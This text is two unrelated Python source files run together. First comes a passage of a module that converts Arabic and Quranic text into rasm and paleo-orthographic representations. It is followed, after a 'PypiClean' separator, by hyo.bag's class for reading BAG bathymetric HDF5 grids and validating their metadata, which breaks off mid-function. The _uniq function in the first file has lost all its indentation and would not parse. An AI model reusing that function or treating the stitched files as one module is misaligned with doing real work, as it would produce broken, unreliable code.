    # separate blocks in arabic graphemic representation
    ARDW_AR = ''.join((A, R, D, W))
    BLOCKS_REGEX = re.compile(rf'((?:[{ARDW_AR}]|.+?[{ARDW_AR}])[^{CHAR}]*|.+)')
    UNSTABLE_ALIF_REGEX = re.compile(r'ᵃA(?=.)')
    UNSTABLE_ALIF_ARA_REGEX = re.compile(r'َا(?=.)')
def _to_paleo(tokens, /, unstable_alif=False):
    """ Convert Arabic-script tokens into paleo-orthographic representation
    and create copies in rasm representation.

    Args:
        tokens (iterator): stream to convert.
        unstable_alif (bool): if True, delete fatha+alif in conversion.

    Yield:
        str, str, str, str: original token, rasmised token in Latin script,
            rasmised token in Arabic script, token in paleo-orthographic
            representation. (An earlier docstring listed the paleo form
            second; the code has always yielded ``tok, rlt, rar, pal``.)
    """
    # The substitution order below is significant: the general paleo mapping
    # must run before the final-position N/Q/Y archigrapheme passes, and the
    # rasm pass must come last so it only touches remaining base letters.
    for tok in tokens:
        pal = tok
        # convert to paleo general
        pal = DATA.PALEO_REGEX.sub(lambda m: DATA.PALEO_MAPPING[m.group(0)], pal)
        # restore consonantal diacritics for ya when appropriate
        pal = re.sub(f'[یى](?=[^ا-ی]*[ا-ی])(?!₂|ɂ|ˀ|ᴬ)', 'ی₂', pal)
        # convert to paleo NQY
        pal = DATA.PALEO_N_REGEX.sub('N', pal)
        pal = DATA.PALEO_Q_REGEX.sub('Q', pal)
        pal = DATA.PALEO_Y_REGEX.sub('Y', pal)
        # convert graphemes to rasm
        pal = DATA.RASM_REGEX.sub(lambda m: DATA.RASM_MAPPING[m.group(0)], pal)
        if unstable_alif:
            pal = DATA.UNSTABLE_ALIF_REGEX.sub('', pal)
        # insert a space after each non-connecting letter (A/R/D/W blocks)
        pal = DATA.ARDW_REGEX.sub(r'\1 ', pal)
        # make copy with only archigraphemes
        rlt = DATA.CREAN_RASM_REGEX.sub('', pal)
        rar = DATA.ABJAD_REGEX.sub(lambda m: ABJAD_MAPPING[m.group(0)], rlt)
        yield tok, rlt, rar, pal
def _tokenise(stream, /, norm_clusters=False):
    """ Split a stream of lines into tokens.

    Args:
        stream (iterator): text to split.
        norm_clusters (bool): normalise ligature clusters before tokenising.

    Yield:
        str: each non-empty token.
    """
    if norm_clusters:
        stream = (DATA.CLUSTERS_REGEX.sub(lambda m: DATA.CLUSTERS[m.group(0)], line)
                  for line in stream)
    # Split on ASCII whitespace/punctuation plus Arabic question mark,
    # comma and semicolon; drop the empty strings re.split produces.
    separators = rf'[{whitespace}{punctuation}؟،؛]'
    for line in stream:
        for token in re.split(separators, line):
            if token:
                yield token
def _clean(tokens, /, unstable_alif=False):
    """ Pair each token with a copy stripped of every character that is not
    in the Arabic abjad inventory.

    Args:
        tokens (iterator): tokens to clean.
        unstable_alif (bool): if True, delete fatha+alif before cleaning.

    Yield:
        str, str: original token, cleaned token.

    NOTE(review): the pair is yielded even when the cleaned token is empty;
    an earlier docstring claimed empty results were skipped, but no filter
    has ever been applied here — confirm which behaviour is intended.
    """
    if unstable_alif:
        tokens = (DATA.UNSTABLE_ALIF_ARA_REGEX.sub('', tok) for tok in tokens)
    for ori in tokens:
        yield ori, DATA.CLEAN_REGEX.sub('', ori)
def _to_rasm(tokens):
    """ Convert each cleaned token to its archigraphemic (rasm) representation.

    Args:
        tokens (iterator): pairs of (original token, cleaned token).

    Yield:
        str, str, str: original token, rasmised token in Latin script (with a
            space appended after each A, R, D, W block terminator), rasmised
            token in Arabic script.
    """
    for ori, clean in tokens:
        # First map the Q/N/Y archigraphemes, then the remaining graphemes.
        latin = DATA.RASM_QNY_REGEX.sub(lambda m: DATA.RASM_QNY_MAPPING[m.group(0)], clean)
        latin = DATA.RASM_REGEX.sub(lambda m: DATA.RASM_MAPPING[m.group(0)], latin)
        # A, R, D and W always end a letterblock, so insert a separating space.
        latin = re.sub(r'([ARDW])', r'\1 ', latin)
        yield ori, latin, DATA.ABJAD_REGEX.sub(lambda m: ABJAD_MAPPING[m.group(0)], latin)
def _uniq(stream, /, paleo=False):
""" Map each rasm block with the list of blocks or tokens they appear in
and calculate number of occurrences.
Args:
stream (iterator): sequence of Arabic token, rasm in Latin script, rasm in Arabic script and
paleo-orthphraphic representation (optional).
paleo (bool): includes paleo-orthographic representation.
Yield:
str, int, set: block in Latin script, block in Arabic script, number of occurrences, tokens where
block appears or 2-item tuples containing ori token and paleo-orthographic representation.
"""
if paleo:
blocks = sorted(((*bl, pal, ori) for ori, *rsm, pal in stream for bl in zip(*(c.split() for c in rsm))), key=lambda x: x[0])
groups = ((k, [(ori, pal) for *_, pal, ori in gr]) for k, gr in groupby(blocks, key=lambda x : (x[:2])))
else:
blocks = sorted(((*bl, ori) for ori, *rsm in stream for bl in zip(*(c.split() for c in rsm))), key=lambda x: x[0])
groups = ((k, [ori for *_, ori in gr]) for k, gr in groupby(blocks, key=lambda x : (x[:2])))
yield from sorted(((*block, len(gr), set(gr)) for block, gr in groups), key=lambda x: x[2], reverse=True)
def _get_blocks(index, source='tanzil-simple', only_rasm=False):
    """ Get sequence of Quran blocks from a Quran index range.

    Args:
        index (tuple): Quran index range of text to retrieve as archigraphemes.
            Format of the index: ((i, j, k, m), (n, p, q, r)). All integers can be None except i.
        source ("tanzil-simple", "tanzil-uthmani", "decotype"): indicate the text source from which to retrieve the results.
            If the source is different from the three indicated above, tanzil-simple will be used.
        only_rasm (bool): do not yield start of rub el hizb (۞ U+06de) nor place of sajda (۩ U+06e9) in output.

    Yield:
        tuple: (original_token, rasm_latin, rasm_arabic, paleo), (sura, vers, word, block), indices 1-based.

    Raise:
        IndexError: when Quran index is out of range.
        PrivateFileError: decotype file is private.
    """
    if source == 'tanzil-uthmani':
        source_file = SOURCE.TANZIL_UTHMANI
    elif source == 'decotype':
        source_file = SOURCE.DECOTYPE
    else:
        # any unrecognised source name silently falls back to tanzil-simple
        source_file = SOURCE.TANZIL_SIMPLE
    source_path = files('rasm_arch_data').joinpath(source_file)
    if source == 'decotype' and not source_path.exists():
        raise PrivateFileError
    with source_path.open() as fp:
        quran = json.load(fp)
    # convert the 1-based Quran indexes to 0-based ones, keeping None as-is
    i, j, k, m = [(ind-1 if ind else ind) for ind in index[0]]
    n, p, q, r = [(ind-1 if ind else ind) for ind in index[1]]
    # we put a maximum upper limit in the end index, copying the start index when the end is absent
    if (n, p, q, r) == (None, None, None, None):
        n, p, q, r = i, j, k, m
    for isura in range(i, len(quran['ind'])):
        if n is not None:
            if isura > n:
                return
        else:
            if isura > i:
                return
        for ivers in range(len(quran['ind'][isura])):
            # skip verses before the start index; stop past the end index
            if j is not None and isura == i and ivers < j:
                continue
            if p is not None and isura == n and ivers > p:
                return
            for iword in range(len(quran['ind'][isura][ivers])):
                if k is not None and isura == i and ivers == j and iword < k:
                    continue
                if q is not None and isura == n and ivers == p and iword > q:
                    return
                for iblock in range(len(quran['ind'][isura][ivers][iword])):
                    if m is not None and isura == i and ivers == j and iword == k and iblock < m:
                        continue
                    if r is not None and isura == n and ivers == p and iword == q and iblock > r:
                        return
                    block = quran['ind'][isura][ivers][iword][iblock]
                    tok, pal = quran['tok'][block]
                    # strip paleographic marks to obtain the bare rasm skeleton
                    rlt = DATA.CREAN_RASM_REGEX.sub('', pal)
                    # m_ avoids shadowing the start-block bound `m` above
                    rar = DATA.ABJAD_REGEX.sub(lambda m_: ABJAD_MAPPING[m_.group(0)], rlt)
                    if not only_rasm or tok not in ('۞', '۩'):
                        yield (tok, rlt, rar, pal), (isura+1, ivers+1, iword+1, iblock+1)
@singledispatch
def rasm_arch(input_):
    """ Convert input to archigraphemic representation.

    Generic entry point of a single-dispatch function: the concrete behaviour
    is provided by the registered overloads for io.TextIOBase (free text) and
    tuple (Quran index range).

    Raises:
        NotImplementedError: for any unregistered input type.
    """
    raise NotImplementedError('Unsupported type')
@rasm_arch.register(TextIOBase)
def _(input_, /, paleo=False, blocks=False, uniq=False, norm_clusters=False, unstable_alif=False):
    """ Clean, tokenise and convert text to archigraphemic representation.

                  +----------------+     +-----------+     +--------+     +----------+
        input --> | _norm_clusters | --> | _tokenise | --> | _clean | --> | _to_rasm | --+--> output
                  +----------------+     +-----------+     +--------+     +----------+   |
                          |                                                  +-------+   |
                          |                                        output <--| _uniq |<--+
                          |              +-----------+                       +-------+
                          +------------> | _to_paleo |--------------------------^
                                         +-----------+

    Args:
        input_ (io.TextIOBase): text to convert to archigraphemes, e.g.
            "كبيكج وكيتكج والجِنّ"
        paleo (bool): convert to paleo-orthographic representation instead of bare rasm.
        blocks (bool): yield results in letterblocks, not words (irrelevant if uniq == True).
        uniq (bool): if True, map letterblocks with list of tokens they appear in and show absolute frequency.
        norm_clusters (bool): if True, normalise Arabic clusters to decomposed form before conversion.
        unstable_alif (bool): if True, delete fatha+alif in conversion.

    Yield:
        (if uniq==False and blocks==False and paleo==False)
        str, str, str: original word, rasmised word in Latin, rasmised word in Arabic, e.g.
            ("كبيكج", "KBBKG", "کٮٮکح")
            ("وكيتكج", "WKBBKG", "وکٮٮکح")
            ("والجِنّ", "WALGN", "والحں")

        (if uniq==False and blocks==False and paleo==True)
        str, str, str, str: original word, rasmised word in Latin, rasmised word in Arabic,
        paleo-orthographic representation of the word, e.g.
            ("كبيكج", "KBBKG", "كٮٮكح", "KB₁B₂KG₁")
            ("وكيتكج", "WKBBKG", "وكٮٮكح", "WKB₂B²KG₁")
            ("والجِنّ", "WALGN", "والحں", "WALG₁ᵢN¹ᵚ")

        (if uniq==False and blocks==True and paleo==False)
        str, list: original word, list of 3-item tuples of block in Arabic, Latin, Arabic rasm, e.g.
            ("كبيكج", [("كبيكج", "KBBKG", "کٮٮکح")])
            ("وكيتكج", [("و", "W", "و"), ("كيتكج", "KBBKG", "کٮٮکح")])
            ("والجِنّ", [("و", "W", "و"), ("ا", "A", "ا"), ("لجِنّ", "LGN", "لحں")])

        (if uniq==False and blocks==True and paleo==True)
        str, list: original word, list of 4-item tuples of block in Arabic, Latin, Arabic rasm
        and paleo-orthographic representation, e.g.
            ("كبيكج", [("كبيكج", "KBBKG", "كٮٮكح", "KB₁B₂KG₁")]),
            ("وكيتكج", [("و", "W", "و", "W"), ("كيتكج", "KBBKG", "كٮٮكح", "KB₂B²KG₁")]),
            ("والجِنّ", [("و", "W", "و", "W"), ("ا", "A", "ا", "A"), ("لجِنّ", "LGN", "لحں", "LG₁ᵢN¹ᵚ")])

        (if uniq==True and paleo==False ; blocks irrelevant)
        str, str, int, set: block in Latin, block in Arabic, total occurrences,
        set of unique types where it appears, e.g.
            ("KBBKG", "کٮٮکح", 2, {"كبيكج", "وكيتكج"})
            ("W", "و", 2, {"وكيتكج", "والجِنّ"})
            ("A", "ا", 1, {"والجِنّ"})
            ("LGN", "لحں", 1, {"والجِنّ"})

        (if uniq==True and paleo==True ; blocks irrelevant)
        str, str, int, set: block in Latin, block in Arabic, total occurrences,
        set of (word, paleo representation) pairs where it appears, e.g.
            ("KBBKG", "كٮٮكح", 2, {("كبيكج", "KB₁B₂KG₁"), ("وكيتكج", "WKB₂B²KG₁")}),
            ("W", "و", 2, {("وكيتكج", "WKB₂B²KG₁"), ("والجِنّ", "WALG₁ᵢN¹ᵚ")}),
            ("A", "ا", 1, {("والجِنّ", "WALG₁ᵢN¹ᵚ")}),
            ("LGN", "لحں", 1, {("والجِنّ", "WALG₁ᵢN¹ᵚ")})
    """
    # uniq output is already block-level, so per-word blocks are redundant
    if uniq and blocks:
        blocks = False
    # build the processing pipeline as a tuple of generator stages
    procs = partial(_tokenise, norm_clusters=norm_clusters),
    if paleo:
        # normalise tanwin
        input_ = (DATA.NORM_REGEX.sub(lambda m: DATA.NORM_MAPPING[m.group(0)], s) for s in input_)
        procs += partial(_to_paleo, unstable_alif=unstable_alif),
    else:
        procs += partial(_clean, unstable_alif=unstable_alif), _to_rasm
    if uniq:
        procs += partial(_uniq, paleo=paleo),
    # chain the stages: each generator consumes the previous one lazily
    results = pipe(input_, *procs)
    if blocks:
        # split each word into its letterblocks, pairing the Arabic segments
        # (from BLOCKS_REGEX) with the space-separated rasm fields
        for ori, *rest in results:
            yield ori, list(zip(DATA.BLOCKS_REGEX.findall(ori), *(r.split() for r in rest)))
    else:
        if uniq:
            if paleo:
                # collapse block-separating spaces inside paleo strings
                yield from ((*fst, {(word, pal.replace(' ', '')) for word, pal in found}) for *fst, found in results)
            else:
                yield from ((ori, *rest) for ori, *rest in results)
        else:
            # word-level output: remove the block-separating spaces
            yield from ((ori, *(r.replace(' ', '') for r in rest)) for ori, *rest in results)
@rasm_arch.register(tuple)
def _(input_, /, paleo=True, blocks=False, uniq=False, source='tanzil-simple', only_rasm=False):
    """ Retrieve quranic text in archigraphemic representation according to index range.

    Args:
        input_ (tuple): Quran index range of text to retrieve as archigraphemes. Format of the index:
            ((i, j, k, m), (n, p, q, r)). All integers can be None except i. E.g.
            (20, 98, 1, None), (20, 98, 8, None)
        paleo (bool): convert to paleo-orthographic representation instead of bare rasm.
        blocks (bool): yield results in letterblocks, not words (irrelevant if uniq == True).
        uniq (bool): if True, map letterblocks with list of tokens they appear in and show absolute frequency.
        source ("tanzil-simple", "tanzil-uthmani", "decotype"): indicate the text source from which to retrieve the results.
            If the source is different from the three indicated above, tanzil-simple will be used.
        only_rasm (bool): do not print start of rub el hizb (۞ U+06de) nor place of sajda (۩ U+06e9) in output.

    Yield:
        (if uniq==False and blocks==False and paleo==False)
        str, str, str, (int, int, int): original word, rasmised word in Latin, rasmised word in Arabic, Quran index e.g.
            ("إِنَّمَآ", "ABMA", "اٮما", (20, 98, 1))
            ("إِلَٰهُكُمُ", "ALHKM", "الهکم", (20, 98, 2))
            ("ٱللَّهُ", "ALLH", "الله", (20, 98, 3))
            ("ٱلَّذِی", "ALDY", "الدی", (20, 98, 4))
            ("لَآ", "LA", "لا", (20, 98, 5))
            ("إِلَٰهَ", "ALH", "اله", (20, 98, 6))
            ("إِلَّا", "ALA", "الا", (20, 98, 7))
            ("هُوَۚ", "HW", "هو", (20, 98, 8))

        (if uniq==False and blocks==False and paleo==True)
        str, str, str, str, (int, int, int): original word, rasmised word in Latin, rasmised word in Arabic,
        paleo-orthographic representation of word, Quran index e.g.
            ("إِنَّمَآ", "ABMA", "اٮما", "AɂᵢB’ᵚᵃMᵃA˜", (20, 98, 1))
            ("إِلَٰهُكُمُ", "ALHKM", "الهکم", "AɂᵢLᵃᴬHᵘKᵘMᵘ", (20, 98, 2))
            ("ٱللَّهُ", "ALLH", "الله", "ALLᵚᵃHᵘ", (20, 98, 3))
            ("ٱلَّذِی", "ALDY", "الدی", "AᵟLᵚᵃD’ᵢY", (20, 98, 4))
            ("لَآ", "LA", "لا", "LᵃA˜", (20, 98, 5))
            ("إِلَٰهَ", "ALH", "اله", "Aɂᵢ LᵃᴬHᵃ", (20, 98, 6))
            ("إِلَّا", "ALA", "الا", "Aɂᵢ LᵚᵃA", (20, 98, 7))
            ("هُوَۚ", "HW", "هو", "HᵘWᵃ⒥", (20, 98, 8))

        (if uniq==False and blocks==True and paleo==True)
        str, list: original word, list of blocks in Latin transcription, Arabic script,
        paleo-orthographic representation and Quranic index, e.g.
            ("إِنَّمَآ", [("إِ", "A", "ا", "Aɂᵢ", (20, 98, 1, 1)), ("نَّمَآ", "BMA", "ٮما", "B’ᵚᵃMᵃA˜", (20, 98, 1, 2))])
            ("لَآ", [("لَآ", "LA", "لا", "LᵃA˜", (20, 98, 5, 1))])
            ("هُوَۚ", [("هُوَۚ", "HW", "هو", "HᵘWᵃ⒥", (20, 98, 8, 1))])

        (if uniq==False and blocks==True and paleo==False)
        str, list: original word, list of blocks in Latin transcription, Arabic script and Quranic index, e.g.
            ("إِنَّمَآ", [("إِ", "A", "ا", (20, 98, 1, 1)), ("نَّمَآ", "BMA", "ٮما", (20, 98, 1, 2))])
            ("لَآ", [("لَآ", "LA", "لا", (20, 98, 5, 1))])
            ("هُوَۚ", [("هُوَۚ", "HW", "هو", (20, 98, 8, 1))])

        (if uniq==True and paleo==False ; blocks is irrelevant)
        str, str, int, set: rasmised block in Latin, rasmised block in Arabic, total occurrences of block,
        set of unique types where it appears, e.g.
            ("A", "ا", 6, {"إِلَّا", "ٱلَّذِی", "إِنَّمَآ", "إِلَٰهَ", "إِلَٰهُكُمُ", "ٱللَّهُ"})
            ("LA", "لا", 2, {"إِلَّا", "لَآ"})
            ("BMA", "ٮما", 1, {"إِنَّمَآ"})

        (if uniq==True and paleo==True ; blocks is irrelevant)
        str, str, int, set: rasmised block in Latin, rasmised block in Arabic, total occurrences of block,
        set of (word, paleo representation) pairs where it appears, e.g.
            ("A", "ا", 6, {("إِلَّا", "Aɂᵢ LᵚᵃA"), ("ٱلَّذِی", "Aᵟ LᵚᵃD’ᵢ Y"), ("إِنَّمَآ", "Aɂᵢ B’ᵚᵃMᵃA˜"), ("إِلَٰهَ", "Aɂᵢ LᵃᴬHᵃ"), ("إِلَٰهُكُمُ", "Aɂᵢ LᵃᴬHᵘKᵘMᵘ"), ("ٱللَّهُ", "A LLᵚᵃHᵘ")})
            ("LA", "لا", 2, {("إِلَّا", "Aɂᵢ LᵚᵃA"), ("لَآ", "LᵃA˜")})
            ("BMA", "ٮما", 1, {("إِنَّمَآ", "Aɂᵢ B’ᵚᵃMᵃA˜")})

    Raise:
        IndexError: Quran index out of range.
        PrivateFileError: decotype file is private.
    """
    # uniq output is already block-level, so per-word blocks are redundant
    if uniq and blocks:
        blocks = False
    try:
        blocks_quran = _get_blocks(input_, source, only_rasm)
        # group blocks into words (same sura and verse and word index)
        blocks_gr = (list(gr) for _, gr in groupby(blocks_quran, key=lambda x: (x[1][1], x[1][2])))
        if not blocks:
            if uniq:
                if paleo:
                    yield from _uniq(((''.join(g[0][0] for g in b), ' '.join(g[0][1] for g in b),
                        ' '.join(g[0][2] for g in b), ''.join(g[0][3] for g in b)) for b in blocks_gr), paleo=paleo)
                else:
                    yield from _uniq(((''.join(g[0][0] for g in b), ' '.join(g[0][1] for g in b), ' '.join(g[0][2] for g in b)) for b in blocks_gr))
            elif paleo:
                yield from ((''.join(g[0][0] for g in b), ''.join(g[0][1] for g in b), ''.join(g[0][2] for g in b),
                             ''.join(g[0][3] for g in b), b[0][1][:-1]) for b in blocks_gr)
            else:
                # word-level output without the paleo field
                yield from ((''.join(g[0][0] for g in b), ''.join(g[0][1] for g in b), ''.join(g[0][2] for g in b), b[0][1][:-1]) for b in blocks_gr)
        else:
            if paleo:
                yield from ((''.join(g[0][0] for g in b), [(*g[0], g[1]) for g in b]) for b in blocks_gr)
            else:
                yield from ((''.join(g[0][0] for g in b), [(*g[0][:-1], g[1]) for g in b]) for b in blocks_gr)
    except (PrivateFileError, IndexError):
        # fix: propagate unchanged with a bare raise; re-instantiating the
        # exception class (as before) discarded the original traceback
        raise
|
PypiClean
|
/hyo.bag-0.5.7-py3-none-any.whl/hyo/bag/bag.py
|
import os
import sys
import logging
import numpy as np
import h5py
from lxml import etree
logger = logging.getLogger(__name__)
from .base import is_bag, File
from .helper import BAGError, Helper
from .meta import Meta
class BAGFile(File):
    """ Represents a BAG (Bathymetric Attributed Grid) file.

    A BAG file is an HDF5 container with a fixed layout under the 'BAG_root'
    group: elevation and uncertainty grids, an XML metadata dataset and a
    tracking list of sounding overrides.
    """

    # dataset paths and attribute names fixed by the BAG specification
    _bag_root = "BAG_root"
    _bag_version = "Bag Version"
    _bag_version_number = b'1.5.3'
    _bag_elevation = "BAG_root/elevation"
    _bag_elevation_min_ev = "Minimum Elevation Value"
    _bag_elevation_max_ev = "Maximum Elevation Value"
    _bag_metadata = "BAG_root/metadata"
    _bag_tracking_list = "BAG_root/tracking_list"
    _bag_tracking_list_len = "Tracking List Length"
    _bag_tracking_list_type = np.dtype([('row', np.uint32), ('col', np.uint32),
                                        ('depth', np.float32), ('uncertainty', np.float32),
                                        ('track_code', np.byte), ('list_series', np.uint16)])
    _bag_uncertainty = "BAG_root/uncertainty"
    _bag_uncertainty_min_uv = "Minimum Uncertainty Value"
    _bag_uncertainty_max_uv = "Maximum Uncertainty Value"
    _bag_elevation_solution = "BAG_root/elevation_solution"
    BAG_NAN = 1000000  # sentinel value used by BAG grids for "no data"
    default_metadata_file = "BAG_metadata.xml"

    def __init__(self, name, mode=None, driver=None,
                 libver=None, userblock_size=None, swmr=False, **kwds):
        """
        Create a new file object.

        See the low level bag.File for a detailed explanation of the options.

        Raises:
            BAGError: if the file is opened for reading but is not a BAG file.
        """
        if mode is not None:
            if 'w' not in mode:
                if not is_bag(name):
                    # fix: the original message contained a bare %s and never
                    # interpolated the offending file name
                    raise BAGError("The passed file %s is not a BAG file" % name)
        super(BAGFile, self).__init__(name=name, mode=mode, driver=driver,
                                      libver=libver, userblock_size=userblock_size, swmr=swmr, **kwds)
        self.meta = None  # populated lazily by populate_metadata()
        self.meta_errors = list()  # filled by validate_metadata()
        self._str = None  # scratch buffer used by __str__/_str_group_info

    @classmethod
    def create_template(cls, name):
        """ Create a BAG file with an empty template structure. """
        logger.debug("create new BAG file: %s" % name)
        try:
            new_bag = File(name, 'w')
            new_bag.create_group(cls._bag_root)
            new_bag.attrs.create(cls._bag_version, cls._bag_version_number, shape=(), dtype="S5")
            elevation = new_bag.create_dataset(cls._bag_elevation, shape=(), dtype=np.float32)
            elevation.attrs.create(cls._bag_elevation_min_ev, 0.0, shape=(), dtype=np.float32)
            elevation.attrs.create(cls._bag_elevation_max_ev, 0.0, shape=(), dtype=np.float32)
            new_bag.create_dataset(cls._bag_metadata, shape=(1, ), dtype="S1")
            tracking_list = new_bag.create_dataset(cls._bag_tracking_list, shape=(), dtype=cls._bag_tracking_list_type)
            tracking_list.attrs.create(cls._bag_tracking_list_len, 0, shape=(), dtype=np.uint32)
            uncertainty = new_bag.create_dataset(cls._bag_uncertainty, shape=(), dtype=np.float32)
            uncertainty.attrs.create(cls._bag_uncertainty_min_uv, 0.0, shape=(), dtype=np.float32)
            uncertainty.attrs.create(cls._bag_uncertainty_max_uv, 0.0, shape=(), dtype=np.float32)
        except (BAGError, OSError) as e:
            raise BAGError("Unable to create the BAG file %s: %s" % (name, e))
        return new_bag

    def has_elevation(self):
        """ Return True if the file contains an elevation dataset. """
        return BAGFile._bag_elevation in self

    def elevation(self, mask_nan=True, row_range=None):
        """
        Return the elevation as numpy array

        mask_nan
            If True, apply a mask using the BAG nan value
        row_range
            If present, a slice of rows to read from
        """
        if row_range:
            if not isinstance(row_range, slice):
                raise BAGError("Invalid type of slice selector: %s" % type(row_range))
            if (row_range.start < 0) or (row_range.start >= self.elevation_shape()[0]) \
                    or (row_range.stop < 0) or (row_range.stop > self.elevation_shape()[0]) \
                    or (row_range.start > row_range.stop):
                raise BAGError("Invalid values for slice selector: %s" % row_range)
        if mask_nan:
            if row_range:
                el = self[BAGFile._bag_elevation][row_range]
            else:
                el = self[BAGFile._bag_elevation][:]
            mask = el == BAGFile.BAG_NAN
            el[mask] = np.nan
            return el
        if row_range:
            return self[BAGFile._bag_elevation][row_range]
        else:
            return self[BAGFile._bag_elevation][:]

    def elevation_shape(self):
        """ Return the (rows, cols) shape of the elevation dataset. """
        return self[BAGFile._bag_elevation].shape

    def has_uncertainty(self):
        """ Return True if the file contains an uncertainty dataset. """
        return BAGFile._bag_uncertainty in self

    def has_product_uncertainty(self):
        """ Return True if the uncertainty layer carries product uncertainty. """
        if self.has_uncertainty() and \
                (self.meta.unc_type == "productUncert" or self.meta.unc_type == "ProductUncert"):  # Leidos bug
            return True
        return False

    def uncertainty(self, mask_nan=True, row_range=None):
        """
        Return the uncertainty as numpy array

        mask_nan
            If True, apply a mask using the BAG nan value
        row_range
            If present, a slice of rows to read from
        """
        if row_range:
            if not isinstance(row_range, slice):
                raise BAGError("Invalid type of slice selector: %s" % type(row_range))
            if (row_range.start < 0) or (row_range.start >= self.uncertainty_shape()[0]) \
                    or (row_range.stop < 0) or (row_range.stop > self.uncertainty_shape()[0]) \
                    or (row_range.start > row_range.stop):
                raise BAGError("Invalid values for slice selector: %s" % row_range)
        if mask_nan:
            if row_range:
                un = self[BAGFile._bag_uncertainty][row_range]
            else:
                un = self[BAGFile._bag_uncertainty][:]
            mask = un == BAGFile.BAG_NAN
            un[mask] = np.nan
            return un
        if row_range:
            return self[BAGFile._bag_uncertainty][row_range]
        else:
            return self[BAGFile._bag_uncertainty][:]

    def uncertainty_shape(self):
        """ Return the (rows, cols) shape of the uncertainty dataset. """
        return self[BAGFile._bag_uncertainty].shape

    def has_density(self):
        """ Return True if the elevation solution carries sounding counts. """
        try:
            self[BAGFile._bag_elevation_solution]['num_soundings']
        except Exception:
            # deliberately broad: any failure means the layer is absent/unusable
            return False
        return True

    def density(self, mask_nan=True, row_range=None):
        """
        Return the density as numpy array

        mask_nan
            If True, apply a mask using the BAG nan value
        row_range
            If present, a slice of rows to read from
        """
        if row_range:
            if not isinstance(row_range, slice):
                raise BAGError("Invalid type of slice selector: %s" % type(row_range))
            if (row_range.start < 0) or (row_range.start >= self.density_shape()[0]) \
                    or (row_range.stop < 0) or (row_range.stop > self.density_shape()[0]) \
                    or (row_range.start > row_range.stop):
                raise BAGError("Invalid values for slice selector: %s" % row_range)
        if mask_nan:
            if row_range:
                de = self[BAGFile._bag_elevation_solution]['num_soundings'][row_range]
            else:
                de = self[BAGFile._bag_elevation_solution]['num_soundings'][:]
            # convert to float so that NaN can be stored in the array
            de = de.astype(float)
            mask = de == BAGFile.BAG_NAN
            de[mask] = np.nan
            return de
        if row_range:
            de = self[BAGFile._bag_elevation_solution]['num_soundings'][row_range]
        else:
            de = self[BAGFile._bag_elevation_solution]['num_soundings'][:]
        de = de.astype(float)
        return de

    def density_shape(self):
        """ Return the shape of the elevation solution dataset. """
        return self[BAGFile._bag_elevation_solution].shape

    def tracking_list(self):
        """ Return the tracking list as numpy array """
        return self[BAGFile._bag_tracking_list][:]

    def tracking_list_fields(self):
        """ Return the tracking list field names """
        return self[BAGFile._bag_tracking_list].dtype.names

    def tracking_list_types(self):
        """ Return the numpy dtype of the tracking list records """
        return self[BAGFile._bag_tracking_list].dtype

    def metadata(self, as_string=True, as_pretty_xml=True):
        """ Return the metadata

        as_string
            If True, convert the metadata from a dataset of characters to a string
        as_pretty_xml
            If True, return the xml in a pretty format
        """
        if as_string and not as_pretty_xml:
            try:
                # tobytes() replaces ndarray.tostring(), removed in numpy 2.0
                return self[BAGFile._bag_metadata][:].tobytes()
            except RuntimeError as e:
                logger.info("exception raised: %s" % e)
                return None
        if as_pretty_xml:
            try:
                xml_tree = etree.fromstring(self[BAGFile._bag_metadata][:].tobytes())
                return etree.tostring(xml_tree, pretty_print=True)
            except RuntimeError as e:
                logger.info("exception raised: %s" % e)
                return None
        return self[BAGFile._bag_metadata][:]

    def extract_metadata(self, name=None):
        """ Save metadata on disk

        name
            The file path where the metadata will be saved. If None, use a default name.
        """
        meta_xml = self.metadata(as_pretty_xml=True)
        if meta_xml is None:
            logger.info("unable to access the metadata")
            return
        if name is None:
            # single-argument os.path.join was a no-op; use the default directly
            name = self.default_metadata_file
        with open(os.path.abspath(name), 'w') as fid:
            fid.write(meta_xml.decode())

    def substitute_metadata(self, path):
        """ Substitute the internal metadata with the content of an XML file

        path
            The file path where the new metadata are.
        """
        path = os.path.abspath(path)
        if not os.path.exists(path):
            logger.info("the passed file does not exist")
            return
        with open(path, 'r') as fid:
            xml_string = str.encode(fid.read())
        is_valid = self.validate_metadata(xml_string)
        if not is_valid:
            logger.info("the passed metadata file is not valid")
            return
        # replace the metadata dataset with a char-by-char copy of the new XML
        del self[BAGFile._bag_metadata]
        xml_sz = len(xml_string)
        self.create_dataset(self._bag_metadata, (xml_sz, ), dtype="S1")
        for i, bt in enumerate(xml_string):
            self[BAGFile._bag_metadata][i] = bt

    def validate_metadata(self, xml_string=None):
        """ Validate metadata based on XML Schemas and schematron. """
        # clean metadata error list
        self.meta_errors = list()
        # assuming a valid BAG
        is_valid = True
        if xml_string is None:
            xml_string = self.metadata(as_pretty_xml=True)
        try:
            xml_tree = etree.fromstring(xml_string)
        except etree.Error as e:
            logger.warning("unabled to parse XML metadata: %s" % e)
            self.meta_errors.append(e)
            return False
        try:
            schema_path = os.path.join(Helper.iso19139_folder(), 'bag', 'bag.xsd')
            schema_doc = etree.parse(schema_path)
            schema = etree.XMLSchema(schema_doc)
        except etree.Error as e:
            logger.warning("unabled to parse XML schema: %s" % e)
            self.meta_errors.append(e)
            return False
        try:
            schema.assertValid(xml_tree)
        except etree.DocumentInvalid as e:
            logger.warning("invalid metadata based on XML schema: %s" % e)
            self.meta_errors.append(e)
            for i in schema.error_log:
                self.meta_errors.append(i)
            is_valid = False
        if is_valid:
            logger.debug("xsd validated")
        try:
            schematron_path = os.path.join(Helper.iso19757_3_folder(), 'bag_metadata_profile.sch')
            schematron_doc = etree.parse(schematron_path)
        except etree.DocumentInvalid as e:
            logger.warning("unabled to parse BAG schematron: %s" % e)
            self.meta_errors.append(e)
            return False
        try:
            from lxml import isoschematron
        except ImportError as e:
            # fix: a failed import raises ImportError; the previous IOError
            # handler could never catch it
            msg = "Unable to load lxml isoschematron files"
            logger.warning("%s: %s" % (msg, e))
            self.meta_errors.append(e)
            return False
        try:
            schematron = isoschematron.Schematron(schematron_doc, store_report=True)
        except etree.DocumentInvalid as e:
            logger.warning("unabled to load BAG schematron: %s" % e)
            self.meta_errors.append(e)
            return False
        if schematron.validate(xml_tree):
            logger.debug("schematron validated")
        else:
            logger.warning("invalid metadata based on Schematron")
            is_valid = False
            ns = {
                'svrl': 'http://purl.oclc.org/dsdl/svrl',
            }
            for i in schematron.error_log:
                err_tree = etree.fromstring(i.message)
                err_msg = err_tree.xpath('/svrl:failed-assert/svrl:text', namespaces=ns)[0].text.strip()
                logger.warning(err_msg)
